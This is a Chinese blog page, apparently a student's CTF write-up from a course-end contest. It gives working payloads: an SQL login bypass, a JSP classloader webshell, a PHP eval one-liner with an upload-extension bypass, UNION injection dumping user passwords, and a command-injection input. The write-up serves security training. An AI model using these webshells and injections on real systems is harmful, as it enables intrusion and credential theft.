<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/2.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/1.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":true,"scrollpercent":"ture"},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":"ture","trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="#sign签到题 f12 base64 抬走#key一个万能密码的题，用户名随便输，密码是 111&#39;or&#39;1&#39;&#x3D;&#39;1  前面三个1也可以换成其他的#java上传文件漏洞，并且是java脚本类型的 &lt;%! class U extends ClassLoader &amp;#123;     U(ClassLoader c) &amp;#123;         super(c)">
<meta property="og:type" content="article">
<meta property="og:title" content="信安世纪7.5的结课赛">
<meta property="og:url" content="http://example.com/2022/07/06/%E4%BF%A1%E5%AE%89%E4%B8%96%E7%BA%AA7-5%E7%9A%84%E7%BB%93%E8%AF%BE%E8%B5%9B/index.html">
<meta property="og:site_name" content="河南农业大学摆烂摸鱼划水阵线">
<meta property="og:description" content="#sign签到题 f12 base64 抬走#key一个万能密码的题，用户名随便输，密码是 111&#39;or&#39;1&#39;&#x3D;&#39;1  前面三个1也可以换成其他的#java上传文件漏洞，并且是java脚本类型的 &lt;%! class U extends ClassLoader &amp;#123;     U(ClassLoader c) &amp;#123;         super(c)">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-07-06T02:58:40.000Z">
<meta property="article:modified_time" content="2022-07-06T03:42:49.170Z">
<meta property="article:author" content="youxiao">
<meta property="article:tag" content="比赛">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://example.com/2022/07/06/%E4%BF%A1%E5%AE%89%E4%B8%96%E7%BA%AA7-5%E7%9A%84%E7%BB%93%E8%AF%BE%E8%B5%9B/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>信安世纪7.5的结课赛 | 河南农业大学摆烂摸鱼划水阵线</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">河南农业大学摆烂摸鱼划水阵线</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">指战中心</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页QAQ</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签QAQ</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档QAQ</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/07/06/%E4%BF%A1%E5%AE%89%E4%B8%96%E7%BA%AA7-5%E7%9A%84%E7%BB%93%E8%AF%BE%E8%B5%9B/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/head.png">
      <meta itemprop="name" content="youxiao">
      <meta itemprop="description" content="摆烂是人类进步的阶梯">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="河南农业大学摆烂摸鱼划水阵线">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          信安世纪7.5的结课赛
        </h1>

        <div class="post-meta">

              <span class="post-meta-item-icon">

                <i class="far fa-calendar"></i>
              </span>

              <span class="post-meta-item-text">发表于</span>

            <span class="post-meta-item">
              

              <time title="创建时间：2022-07-06 10:58:40 / 修改时间：11:42:49" itemprop="dateCreated datePublished" datetime="2022-07-06T10:58:40+08:00">2022-07-06</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/ctf-wp/" itemprop="url" rel="index"><span itemprop="name">ctf-wp</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>#sign<br>签到题 f12 base64 抬走<br>#key<br>一个万能密码的题，用户名随便输，密码是</p>
<pre><code>111&#39;or&#39;1&#39;=&#39;1
</code></pre>
<p>前面三个1也可以换成其他的<br>#java<br>上传文件漏洞，并且是java脚本类型的</p>
<pre><code>&lt;%!
class U extends ClassLoader &#123;
    U(ClassLoader c) &#123;
        super(c);
    &#125;
    public Class g(byte[] b) &#123;
        return super.defineClass(b, 0, b.length);
    &#125;
&#125;

public byte[] base64Decode(String str) throws Exception &#123;
    try &#123;
        Class clazz = Class.forName(&quot;sun.misc.BASE64Decoder&quot;);
        return (byte[]) clazz.getMethod(&quot;decodeBuffer&quot;, String.class).invoke(clazz.newInstance(), str);
    &#125; catch (Exception e) &#123;
        Class clazz = Class.forName(&quot;java.util.Base64&quot;);
        Object decoder = clazz.getMethod(&quot;getDecoder&quot;).invoke(null);
        return (byte[]) decoder.getClass().getMethod(&quot;decode&quot;, String.class).invoke(decoder, str);
    &#125;
&#125;
%&gt;
&lt;%
String cls = request.getParameter(&quot;passwd&quot;);
if (cls != null) &#123;
    new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
&#125;
%&gt;
</code></pre>
<p>把这样一个.jsp的木马上传上去，打开&#x2F;upload&#x2F;1.jsp&#x2F;的目录，如果能显示空白页，大概率能成<br>用蚁剑或者菜刀之类的webshall连进去，密码是passwd，进去能在根目录找到flag  </p>
<h1 id="browser"><a href="#browser" class="headerlink" title="browser"></a>browser</h1><p>也是木马题，不过和上面那个不太一样，需要绕过<br>我们用php一句话木马</p>
<pre><code>&lt;?php @eval($_POST[value]);?&gt;
</code></pre>
<p>上传时候，先改成1.jpg，然后用brupsuit抓包，把上传文件包的文件后缀改回.php<br>同样，目录访问一下，空白页，回来用webshell连，密码是value，根目录有flag  </p>
<h1 id="mapmap"><a href="#mapmap" class="headerlink" title="mapmap"></a>mapmap</h1><p>一道注入题，而且有报错有回显<br>id&#x3D;1’得到报错，所以代码里是’<br>然后</p>
<pre><code>payload: id=-1&#39; union select 1,2,3,4,5,6 -- +
</code></pre>
<p>得到回显数为六，并且显示了2和3<br>然后暴库</p>
<pre><code>payload: id=-1&#39; union select 1,2,group_concat(username,0x3a,password) from security.users,4,5,6 -- +
</code></pre>
<p>之后再爆表爆字段，拿到字段值key1</p>
<h1 id="ping"><a href="#ping" class="headerlink" title="ping"></a>ping</h1><p>一个rce注入<br>输入</p>
<pre><code>127.0.0.1;cat$&#123;IFS&#125;../../flag
</code></pre>
<p>即可拿到flag</p>
<p>#我是傻逼<br>因为中间摸了六个小时鱼，就写了这么多（逃</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%AF%94%E8%B5%9B/" rel="tag"># 比赛</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/06/29/%E6%B5%85%E5%AD%A6%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C%EF%BC%881-%E6%A6%82%E8%BF%B0%EF%BC%89/" rel="prev" title="浅学计算机网络（1.概述）">
      <i class="fa fa-chevron-left"></i> 浅学计算机网络（1.概述）
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/07/14/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8Cweb%E9%9A%BE%E5%BA%A62/" rel="next" title="难度2">
      难度2 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#browser"><span class="nav-number">1.</span> <span class="nav-text">browser</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#mapmap"><span class="nav-number">2.</span> <span class="nav-text">mapmap</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#ping"><span class="nav-number">3.</span> <span class="nav-text">ping</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="youxiao"
      src="/images/head.png">
  <p class="site-author-name" itemprop="name">youxiao</p>
  <div class="site-description" itemprop="description">摆烂是人类进步的阶梯</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">36</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories">
          
        <span class="site-state-item-count">18</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="/1796574343@qq.com" title="E-Mail → 1796574343@qq.com"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>
        <div class="back-to-top motion-element">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">youxiao</span>
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>
-->

        








      </div>
    </footer>
  </div>

  
  
  <script color='0,255,255' opacity='1' zIndex='-1' count='20' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
